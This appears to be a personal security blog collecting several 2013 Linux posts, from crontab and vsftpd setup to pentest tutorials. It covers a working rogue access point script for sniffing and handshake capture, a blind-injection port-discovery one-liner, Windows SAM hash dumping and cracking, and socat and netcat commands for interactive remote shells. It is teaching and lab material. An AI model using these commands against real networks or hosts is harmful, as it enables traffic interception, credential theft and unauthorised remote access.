Digital Notes – GoSecure!

Use Crontab to schedule tasks on Linux

Peru — Fri, 20 Dec 2013 17:26:01 +0000

You can use Crontab to schedule the execution of tasks. The command crontab -l list all the scripts already scheduled on your machine and the option -e runs the editing mode.
The basic format string looks like this:

A B C D E /bin/do_something.sh

Where
A = minutes (0-59)
B = hours (0-23)
C = day (1-31)
D = month (1-12)
E = week day (0-6 where 0 is Sunday)

The following are examples for:
– Execute /bin/do_something.sh at 9:40 PM from monday to wednesday
– Execute the script every 15 minute and every day
– Execute the script every 21st and 44th minute on every hour and every day, but only in December

40 21 * * 1-3 /bin/do_something.sh
*\15 * * * * /bin/do_something.sh
21,44 * * 12 * /bin/do_something.sh

Other interesting options:
@reboot = Run once, at startup
@yearly = Run once a year. Like “0 0 1 1 *”
@annually (same as @yearly)
@monthly = Run once a month. Like “0 0 1 * *”
@weekly = Run once a week. Like “0 0 * * 0”
@daily = Run once a day. Like “0 0 * * *”
@midnight (same as @daily)
@hourly = Run once every hour. Like “0 * * * *”

This execute /bin/do_something.sh once, at startup:

@reboot /bin/do_something.sh

How can you manipulate the output?

By default the output is sending to the user (root) mailbox, but it can be redirected.
This Add a row to the file do_something.log inserting output and errors:

@weekly /bin/do_something.sh >> /var/log/do_something.log 2>&1

Send a mail to me@mydomain.com:

* 1,2,3 * * * /bin/script 2>&1 | mail -s "Cronjob ouput" me@mydomain.com:

Trash all output:

@daily /bin/script > /dev/null 2>&1

Rougue Access Point using Kali Linux

Peru — Fri, 20 Sep 2013 10:07:44 +0000

A Rougue Access Point (RAP) is a fake wifi connection that can be used to sniff information.
Basically you have a PC (Kali Linux live in this case) with 2 interfaces: a wired one (eth0) connected to a working network and a wireless one (wlan0).
The wireless card will be configured as AccessPoint (AP) and a bridge will be created to link wired and wireless connections.
When a user connects to the new hot spot created, his data are bridged, through the PC, to the wired connection and proxed to the destination (internet).
I use for these operations airbase-ng command (aircrack-ng suite).

Some scenarios:
– Sniffing traffic
I setup a RAP and start wireshark, ettercap or another network sniffer. Every connections that pass through my PC are intercepted.
– Phishing
I setup a RAP and force it to use mine DNS Server. If someone will connects to me and start to surf I am able to redirect traffic using my DNS. In this case I can implement some kind of phishing.
– Company network back door
I setup, may be using a small RaspberryPi, an access point using the Company network as wired interface. This is an hot spot directly connectet to the Company LAN.
– Caffè-Latte attack
Locoking at the wireless packets you can see the client trying to connect to the previusly registred access point (eg. MY_NETWORK). I Can setup an access point using the same SID the client is searching for. When the client, that is serching for a known SSID, find my RAP named MY_NETKORK it immediatly try to connect. I can use this connection to sniff WPA handshakes or WEP packets and try to decode passwords.
– Extend my connection
I have a notebook connected to a LAN but no access point. I also have a smartphone and I want a wireless connection on-the-fly.

The basic configuration:
– eth0, the wired connection linked to the network
– a DHCP server working on the LAN where eth0 is connected
– wlan0, a wireless interface able to be setted up in monitor mode

I start the monitor mode on wlan0:

root@kali:~# airmon-ng start wlan0

This will create the mon0 interface.
Now I setup an AP on mon0, named “MY_network”, channel 11 and WEP autentication. I can also set it as a free wifi without password (airbase-ng --help).

root@kali:~# airbase-ng --essid MY_network -c 11 -w abcdefabcdefabcdefabcdef12 mon0

This will create the at0 interface.
Now the AP is started, in another terminal window I make a bridge named rougue-bridge and link at0 to eth0 using the bridge-utils. Note that in Kali Linux the bridge-utils have to be installed (apt-get install bridge-utils) in order to use brctl command.

root@kali:~# brctl addbr test-bridge
root@kali:~# brctl addif test-bridge eth0
root@kali:~# brctl addif test-bridge at0

I can release the IPs of eth0 and at0. This is because the two interfaces are now integrated in the virtual bridge and don’t need an IP anymore:

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 down
root@kali:~# ifconfig at0 0.0.0.0 up

I need also the IP forwarding:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

At the end I configure the test-bridge. Differently from eth0 and ap0 the bridge needs an IP of the LAN where eth0 is connected.

root@kali:~# ifconfig test-bridge 192.168.x.y netmask 255.255.255.0 broadcast 192.168.x.255 up
root@kali:~# route add default gw 192.168.x.1

Note that these are temporary operations that will be discarded by rebooting the system.

Extra
Starting an AP to sniffing handshake.

root@kali:~# airbase-ng -c 6 -e ESSID -z 2 -W 1 -F file.cap wlan0

-z sets WPA1 tags (2 = TKIP)
-W set WEP flag in beacons. The option -W 1 is recommended when using -z or -Z
-F where to store the cap file.

Here’s my old simple script to start a Rougue Access Point using Linux Bash. It may need some adjustment, but I think it will work.

#!/bin/sh
echo "---------------------------------------"
echo "Script per la creazione di un Rougue AP"
echo "---------------------------------------"
echo "Digita"
echo " Per creare un Rougue AP per la cattura dell'handshake digita ----> 1"
echo " Per creare un Rougue AP per condividere la connessione digita ---> 2"
read CHOSE1
if [ "${CHOSE1}" == "1" ]
then
#Inizio creazione AP per cattura handshake
echo
echo "Creazione AP per cattura handshake"
echo
echo "Quale essid vuoi utilizzare?"
read ESSID1
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN1
echo "IL file con i pacchetti è salvato in /tmp/${ESSID1}.cap"
ifconfig wlan0 down
airmon-ng start wlan0
airbase-ng -c ${CHAN1} -e ${ESSID1} -z 2 -W 1 -F /tmp/${ESSID1}.cap wlan0
#Fine creazione AP per cattura handshake
read
elif [ "${CHOSE1}" == "2" ]
then
#Inizio creazione AP per condivisione connessione
echo
echo "Creazione AP per condivisione connessione"
echo
echo "Faccio partire la funzionalità di monitoring su wlan0"
ifconfig wlan0 down
airmon-ng start wlan0
echo "Creo un AP sull'interfaccia virtuale at0"
echo "Quale essid vuoi utilizzare?"
read ESSID
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN
echo "Impostare una password? (y/n)"
read CHOSE2
if [ "${CHOSE2}" == "y" ]
then
gnome-terminal --geometry 83x19 -x bash -c "
echo "La password è stata impostata di default WEP abcdefabcdefabcdefabcdef12"
airbase-ng --essid ${ESSID} -c ${CHAN} -w abcdefabcdefabcdefabcdef12 mon0"
else
echo "La password non è stata impostata"
gnome-terminal --geometry 83x19 -x bash -c "
airbase-ng --essid ${ESSID} -c ${CHAN} mon0"
fi
echo "Creo l'interfaccia br0 bridge vi ecollego eth0 e at0"
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
ifconfig eth0 down
ifconfig eth0 0.0.0.0 up
ifconfig at0 down
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Inserisci i dati per nuova interfaccia bridge creata"
echo -n "Indirizzo ip:"
read IP
echo -n "Netmask:"
read NETMASK
echo -n "Broadcast:"
read BROAD
echo -n "Gateway:"
read ROUTE
ifconfig br0 ${IP} netmask ${NETMASK} broadcast ${BROAD} up
route add default gw ${ROUTE}
#Fine creazione AP per condivisione connessione
read
else
echo "Scelta non corretta premere invio per uscire dal programma."
read
fi

Listener discovery using ping PoC

Peru — Fri, 19 Jul 2013 13:40:07 +0000

This is a awesome way to use usual programs/commands in an unusual way. This PoC can be used to discover open ports on a remote PC when we have the possibility to send to it a blind command but we have no idea about TCP control in the remote environment. These simple scripts take advantage of the length of ICMP packets sended by the ping command. Some simple pipeling provide the normalization of sended and captured strings. In the following case two Linux machines are used.

On the local PC I start a logging process:

iptables -I INPUT -p ICMP -j LOG

On the PC to test, maybe using a blind command:

netstat -lntp | grep LISTEN | awk '{print $4}' | cut -d: -f2 | grep -ve "^$" |sort -u | while read line ; do echo $line; ping -c 1 -s $line ; done;

Again on local PC I collect and normalize the log:

tail /var/log/messages | grep LEN |awk '{print $13}'| cut -d= -f2 |sort -n -u| while read line; do PORT=$(($line-28)) && echo Open Port = $PORT; done;

I based this Proof of Concept on the article “Blind Command Line Injection” from PenTest Magazine by Mr. Chris Duffy: thank you.

Setting up a ssh server on Kali linux

Peru — Mon, 15 Jul 2013 22:46:35 +0000

Environment:
The SSH server is a Kali Linux (hostname:kali ip:10.0.0.3)
The SSH client is a Backtrack (hostname:bt ip:10.0.0.2)

Configuration:
On the Kali distribution the ssh server is already installed so I have only to start it; I can do it using the menu Applications > Kali Linux > System Services > SSH > sshd start
After that I can immediatly connect from client using the user autentication

root@bt:~# ssh root@10.0.0.3
root@10.0.0.3's password:
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Ofcourse I want to secure the SSH server, so I stop the service and I will setup SSH to use an RSA authentication.
On server I create the keys using ssh-keygen command; this will create 2 keys:
– Public key, resident on the server, in my case it is called id_rsa.pub
– Privare key, used by the client, called id_rsa

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
eb:63:b6:89:a3:74:dd:76:9f:ea:7f:1e:d4:d4:ba:9b root@kali
The key's randomart image is:
+--[ RSA 2048]----+
| |
| .|
| o|
| o.|
| S ...|
| . o .. |
| . . o o . .. |
| . ..o+o . . +o|
| ...++o .ooEo.|
+-----------------+

As I said, the private key, has to be transferred on the client. I start a Netcat listener on machine called bt

root@bt:~# nc -lp 4444 > id_rsa

On the server, the Kali machine, I connect to the listener and transfer the key

root@kali:~# nc -w 1 10.0.0.2 4444 < /root/.ssh/id_rsa

Note that NC file transfert is not a secure way to pass the key. That is why NC isn’t an encrypted channel. I use this method because I am in a lab/test environment.

On server I have to edit the file /etc/ssh/sshd_config to allow RSA authentication.

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys

Is a good idea to remove user autentication too

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

I save the file and restart the service.
The last server operation is to add the id_rsa.pub key on the file indicated on sshd_config in the field AuthorizedKeysFile

root@kali:~# cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

Note that I have to add the key (>>) to the file, not to overwrite it (>), since I can have more than one publik key stored in the same file.

I move on the client and give the right permission to id_rsa (chmod 600 id_rsa). I am not used to store private keys on the default folder, but I prefer to store it in an encrypted folder and then to use the -i option of the ssh client.

Ok, let’s try the access using my new RSA key

root@bt:~# ssh root@10.0.0.3 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Remember that is good:
– To store your private keys in a protected place
– To create keys with strong password
– To hardening sshd_config (eg. disable root access)
– To take a look at the auth file log (/var/log/auth.log)

SAM dump and Windows password decrypt.

Peru — Tue, 18 Jun 2013 13:29:06 +0000

The Windows passwords are stored and crypted in the SAM file (c:\windows\system32\config\). In the same folder you can find the key to decrypt it: the file SYSTEM. This two files are locked by the kernel when the operating system is up, so to backup it and decrypt you have to use some bootable linux distro, to mount the disk when the system is down or to use some program like fgdump, pwdump or meterpreter hashdump. Someone told me even that is possible to copy this files causing a Blue Sceen of Death an then remotely dump files, but I never try it.

An alternative, when the operating system is working, is to take the two twins files present in folder c:\windows\repair\ that the system create as a backup. This work up to Windows XP (think also Vista), but I can’t be able to find these files on Windows7. If you know something more, write me.

Once you have the files you use bkhive to extract the bootkey:

bkhive /mnt/ntfs/Windows/System32/config/SYSTEM /tmp/bootkey

Then put together the bootkey and the SAM file:

samdump2 /mnt/ntfs/Windows/System32/config/SAM /tmp/bootkey > /tmp/hash.txt

And then try to crack the hash:

john --format=NT /tmp/hash.txt

This is just an exemple of use of this tools. To crack hash you can algo use google that is always the bigest resource.

From a non interactive shell to an interactive one

Peru — Tue, 18 Jun 2013 10:08:59 +0000

As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

Install ftp server on Kali Linux

Peru — Thu, 13 Jun 2013 12:16:34 +0000

This is a simple how to install vsftpd server on Kali Linux. The more important configuration file is /etc/vsftpd.conf. Read carefully it and refer to vsftpd home site.

Download and install vsftpd:

root@kali:~# apt-get install vsftpd

If you want to allow local users to log in and to allow ftp uploads you have to edit file /etc/vsftpd.conf uncommenting the following:

local_enable=YES
write_enable=YES

Also set this parameters:

chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list

To secure your server, disable anonymous access if not required:

anonymous_enable=NO

If you wish you can also modify the banner present in vsftpd.conf, but this is usefull only to prevent simple banner grabbing. A specific tool such as NMAP will discover your server version anyway.

Now create the file /etc/vsftpd.chroot_list and add the local users you want allow to connect to FTP server.
Start service and test connections:

root@kali:~# service vsftpd start
Starting FTP server: vsftpd.
root@kali:~# netstat -nat | grep 21
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
root@kali:~# ftp 127.0.0.1
Connected to 127.0.0.1.
220 (vsFTPd 2.3.5)
Name (127.0.0.1:root): user-one
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>